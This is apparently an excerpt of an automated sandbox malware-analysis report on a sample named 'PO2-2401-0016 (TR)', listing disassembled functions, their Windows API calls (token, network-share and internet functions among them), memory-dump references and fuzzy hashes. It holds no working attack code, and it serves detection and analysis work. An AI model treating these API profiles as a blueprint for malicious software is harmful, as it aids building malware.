                                  • Part of subcall function 00169639: BeginPath.GDI32(?), ref: 001696B9
                                  • Part of subcall function 00169639: SelectObject.GDI32(?,00000000), ref: 001696E2
                                • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001E8887
                                • LineTo.GDI32(?,?,?), ref: 001E8894
                                • EndPath.GDI32(?), ref: 001E88A4
                                • StrokePath.GDI32(?), ref: 001E88B2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                • String ID:
                                • API String ID: 1539411459-0
                                • Opcode ID: c9951a552a88de4d3937dbfa378370f2818589534fd3bfa2054bf335c16571eb
                                • Instruction ID: 50293e575f18c032634952dc56eae5cdf6e1a3facc1927af38d952f567ffc050
                                • Opcode Fuzzy Hash: c9951a552a88de4d3937dbfa378370f2818589534fd3bfa2054bf335c16571eb
                                • Instruction Fuzzy Hash: 22F03A3A041698FADB125FD4AC0DFCE3A59AF16310F048000FE12690E1C77555A2CFE5
                                Function 001698B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                Download Yara Rule
                                APIs
                                • GetSysColor.USER32(00000008), ref: 001698CC
                                • SetTextColor.GDI32(?,?), ref: 001698D6
                                • SetBkMode.GDI32(?,00000001), ref: 001698E9
                                • GetStockObject.GDI32(00000005), ref: 001698F1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Color$ModeObjectStockText
                                • String ID:
                                • API String ID: 4037423528-0
                                • Opcode ID: 9311caa5f2984efbdd564183020a999d9506f759f0d93f20172307b240d09d65
                                • Instruction ID: f1722d5a1ba19309466168c2a872140b64be357324a72ec4c6b13aadee6ecc6e
                                • Opcode Fuzzy Hash: 9311caa5f2984efbdd564183020a999d9506f759f0d93f20172307b240d09d65
                                • Instruction Fuzzy Hash: 13E06D31244680EADB215BB8EC49BEC3F61EB52736F048219F6FA584E1C37146919F10
                                Function 001B162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 001B1634
                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,001B11D9), ref: 001B163B
                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,001B11D9), ref: 001B1648
                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,001B11D9), ref: 001B164F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CurrentOpenProcessThreadToken
                                • String ID:
                                • API String ID: 3974789173-0
                                • Opcode ID: 3377e023383d48d1d342e99c16e6af86068c9f8d71506c7b86d0552998e938a4
                                • Instruction ID: 33f6b75816b53be5178a26024104fdc0deba0cd74ffa4cfa1b1d376cc20cebad
                                • Opcode Fuzzy Hash: 3377e023383d48d1d342e99c16e6af86068c9f8d71506c7b86d0552998e938a4
                                • Instruction Fuzzy Hash: 4DE08C36602211EBD7201FE4AE4DB8F3B7CAF547A2F158808F646CD080E7748482CBA0
                                Function 001AD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • GetDesktopWindow.USER32 ref: 001AD858
                                • GetDC.USER32(00000000), ref: 001AD862
                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001AD882
                                • ReleaseDC.USER32(?), ref: 001AD8A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: 5fb5b6bfd601eb650301cc96854fc33d617fcd7509aa6ed00e3b556a6c8c8354
                                • Instruction ID: 7683996b03be14eb6ceeeea1f4397ea6a63391dbab261563ee672c46cb96b620
                                • Opcode Fuzzy Hash: 5fb5b6bfd601eb650301cc96854fc33d617fcd7509aa6ed00e3b556a6c8c8354
                                • Instruction Fuzzy Hash: A0E01AB8800204DFCF419FE4DC4866EBBB1FB48311F118409F816EB750C7384992AF80
                                Function 001AD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                Download Yara Rule
                                APIs
                                • GetDesktopWindow.USER32 ref: 001AD86C
                                • GetDC.USER32(00000000), ref: 001AD876
                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001AD882
                                • ReleaseDC.USER32(?), ref: 001AD8A3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: cdb952920b08dc96e74f81485cc875cd62b1e671e0f2a6c62b62080191c4e14d
                                • Instruction ID: f3099c2a4f126f4b9dd719f364912cdb8a383943c695fdb07094f23851925816
                                • Opcode Fuzzy Hash: cdb952920b08dc96e74f81485cc875cd62b1e671e0f2a6c62b62080191c4e14d
                                • Instruction Fuzzy Hash: 93E012B4C00200EFCF40AFE4DC8866EBBB1BB48311B108409F81AEB750CB385982AF80
                                Function 001C4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00157620: _wcslen.LIBCMT ref: 00157625
                                • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 001C4ED4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Connection_wcslen
                                • String ID: *$LPT
                                • API String ID: 1725874428-3443410124
                                • Opcode ID: 11f4dbcfe8c5fa8e0a0f120c6eff3c34125e701fbfb71e79d7f7758739ad7039
                                • Instruction ID: bdccafb17d88d01912f4a739ad55d167985cfabd5715cb449c37e88f0b010c42
                                • Opcode Fuzzy Hash: 11f4dbcfe8c5fa8e0a0f120c6eff3c34125e701fbfb71e79d7f7758739ad7039
                                • Instruction Fuzzy Hash: C0917B74A042049FDB14DF58C494FAABBF1AF64304F19809DE84A9F3A2D735EE85CB90
                                Function 0017E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                Download Yara Rule
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 0017E30D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: dfb2ac2cefe9cf1b69acf60ad67a50187fc8e5ce56ec6775b6a127ff2838a1e4
                                • Instruction ID: 2f0414df68c60a4ff7c075c712b45b4cffc0499d565ba97df42b11ec6c2f4479
                                • Opcode Fuzzy Hash: dfb2ac2cefe9cf1b69acf60ad67a50187fc8e5ce56ec6775b6a127ff2838a1e4
                                • Instruction Fuzzy Hash: D7513761A0C20296CB157724C94137A3BF4AB54740F34CED8E09A832E9EB35CED1DF46
                                Function 001D7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                Download Yara Rule
                                APIs
                                • CharUpperBuffW.USER32(001A569E,00000000,?,001ECC08,?,00000000,00000000), ref: 001D78DD
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                • CharUpperBuffW.USER32(001A569E,00000000,?,001ECC08,00000000,?,00000000,00000000), ref: 001D783B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BuffCharUpper$_wcslen
                                • String ID: <s!
                                • API String ID: 3544283678-2588671885
                                • Opcode ID: 8ce586bd6aba487b93901107cc334d07e3acc5fba7a30dd1a7161fb58bc42fcd
                                • Instruction ID: cfb542ee91d69d090ebdbc296683a686a1a9c4ac2d9e7329ceb66f450223305a
                                • Opcode Fuzzy Hash: 8ce586bd6aba487b93901107cc334d07e3acc5fba7a30dd1a7161fb58bc42fcd
                                • Instruction Fuzzy Hash: 31615E72914118EACF08EBA4DCA1DFDB374BF28305B844526E952AB191FF345A49DBA0
                                Function 0016E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: #
                                • API String ID: 0-1885708031
                                • Opcode ID: e74337ba57b2852d3a62f5b869ce367c6aec06da2c64a6f183196e1a18177728
                                • Instruction ID: ed717b7508800db7161ba330e6c7f9fe28721e13770d2ac604829c4ad372bcc3
                                • Opcode Fuzzy Hash: e74337ba57b2852d3a62f5b869ce367c6aec06da2c64a6f183196e1a18177728
                                • Instruction Fuzzy Hash: C6516479900346DFDB19DFA8C891ABA7BE5EF26310F244119FC919B2C0DB349D56CBA0
                                Function 0016F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000000), ref: 0016F2A2
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0016F2BB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: GlobalMemorySleepStatus
                                • String ID: @
                                • API String ID: 2783356886-2766056989
                                • Opcode ID: c534eb53d9e58a9fb66d7975ec36ffa046410414bcd45b34734075e68dc9858d
                                • Instruction ID: 33689b676728d23587d7eb94e7320452bb124306e9654ff776032c993270386d
                                • Opcode Fuzzy Hash: c534eb53d9e58a9fb66d7975ec36ffa046410414bcd45b34734075e68dc9858d
                                • Instruction Fuzzy Hash: D0515771408744DBD320AF14EC86BAFBBF8FB95301F81884DF5E945196EB708529CBA6
                                Function 001D5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 001D57E0
                                • _wcslen.LIBCMT ref: 001D57EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: BuffCharUpper_wcslen
                                • String ID: CALLARGARRAY
                                • API String ID: 157775604-1150593374
                                • Opcode ID: 74a4b3b6ea795ad713e932749f48bc5bb1c8e20f1375ef55c3990886d0da4261
                                • Instruction ID: 40d88311a2f2c46150392b930240810290fb121da801e6ccbc20ad61cddd0d03
                                • Opcode Fuzzy Hash: 74a4b3b6ea795ad713e932749f48bc5bb1c8e20f1375ef55c3990886d0da4261
                                • Instruction Fuzzy Hash: 2041A031A00209DFCF14DFA9C8818AEBBB6FF69314F10416AE515AB391E7349D81CB90
                                Function 001CD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 001CD130
                                • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001CD13A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CrackInternet_wcslen
                                • String ID: |
                                • API String ID: 596671847-2343686810
                                • Opcode ID: f7dab63c0d5173c1dae1e644be3577186482e02f7b2f5395021a4b3b01ad5c8a
                                • Instruction ID: 6b5276cf5ae7eddfe0135b784975c3185359ca399ad6f7b1fcc47067c3dbb471
                                • Opcode Fuzzy Hash: f7dab63c0d5173c1dae1e644be3577186482e02f7b2f5395021a4b3b01ad5c8a
                                • Instruction Fuzzy Hash: 3531F871D01109ABCF15EFA4DC85AEE7BB9FF24300F040069F815AA161D731AA46CB90
                                Function 001E356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(?,?,?,?), ref: 001E3621
                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001E365C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$DestroyMove
                                • String ID: static
                                • API String ID: 2139405536-2160076837
                                • Opcode ID: 7901795866f451fdb803683cab74f91c1b4083d6d6fed057a44af844c2de7ec9
                                • Instruction ID: 5d4caa35a8b88a046845d9e54ab0ff147b3ea99aeab738c1e5c243c3dfea4321
                                • Opcode Fuzzy Hash: 7901795866f451fdb803683cab74f91c1b4083d6d6fed057a44af844c2de7ec9
                                • Instruction Fuzzy Hash: D5319E71100A44AEDB109F79DC85EFF73A9FF98760F009619F8A597280DB31AD92D760
                                Function 001E4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 001E461F
                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001E4634
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: '
                                • API String ID: 3850602802-1997036262
                                • Opcode ID: 7bd75c92e11d5884fc8a1643aa7ee902166f9d95ee5799a480e48513329f153a
                                • Instruction ID: b6af29e73e9d958a400243e0d7b8fb02bc79c841d8dd976b76299186daa41de7
                                • Opcode Fuzzy Hash: 7bd75c92e11d5884fc8a1643aa7ee902166f9d95ee5799a480e48513329f153a
                                • Instruction Fuzzy Hash: A8311874A01759AFDB14CFAAC990BDEBBB5FF49300F14406AE905AB391D770A941CF90
                                Function 001E31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001E327C
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001E3287
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: Combobox
                                • API String ID: 3850602802-2096851135
                                • Opcode ID: 31a78315ff84cecf971bcfecaf67ee4313a099e4dff3df5d7238d289c3a7603f
                                • Instruction ID: 61100ad46a4a10fd3b6e7eb7e646975c4849a0d3ace3081b4f5205181d7079c5
                                • Opcode Fuzzy Hash: 31a78315ff84cecf971bcfecaf67ee4313a099e4dff3df5d7238d289c3a7603f
                                • Instruction Fuzzy Hash: E411D3712005497FEF259E95DC88EAF37AAEB943A4F100124FA6897290D7319D518760
                                Function 00184B45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 00184B91
                                • GetFileType.KERNEL32(00000000), ref: 00184BA3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FileHandleType
                                • String ID: 8
                                • API String ID: 3000768030-3897458245
                                • Opcode ID: abc5046b1c4f6352a0318e57fa8c8df706cc554ebc8b01e1343368288b181793
                                • Instruction ID: c7be741eb425de9c2806cef988daf1200dc75b5913c194cd5a1d96f0a09cbecc
                                • Opcode Fuzzy Hash: abc5046b1c4f6352a0318e57fa8c8df706cc554ebc8b01e1343368288b181793
                                • Instruction Fuzzy Hash: CD1184351087834BD734AE7D9CC8722BA98A796334B39071AD1B6865F1CB70DA86DB40
                                Function 001E3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0015600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0015604C
                                  • Part of subcall function 0015600E: GetStockObject.GDI32(00000011), ref: 00156060
                                  • Part of subcall function 0015600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0015606A
                                • GetWindowRect.USER32(00000000,?), ref: 001E377A
                                • GetSysColor.USER32(00000012), ref: 001E3794
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                • String ID: static
                                • API String ID: 1983116058-2160076837
                                • Opcode ID: 8969c02eae11e5655311b9cdea95ac4e08c5541c350db938185578f0e17809ba
                                • Instruction ID: 6d1e68bef1bee937c8da48ced31df3082846c384055d3c08ef292048b5d043fe
                                • Opcode Fuzzy Hash: 8969c02eae11e5655311b9cdea95ac4e08c5541c350db938185578f0e17809ba
                                • Instruction Fuzzy Hash: A51159B2610649AFDF10DFA8CC49EEE7BB8EB08314F004514F965E3250D735E8519B90
                                Function 001CCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001CCD7D
                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001CCDA6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Internet$OpenOption
                                • String ID: <local>
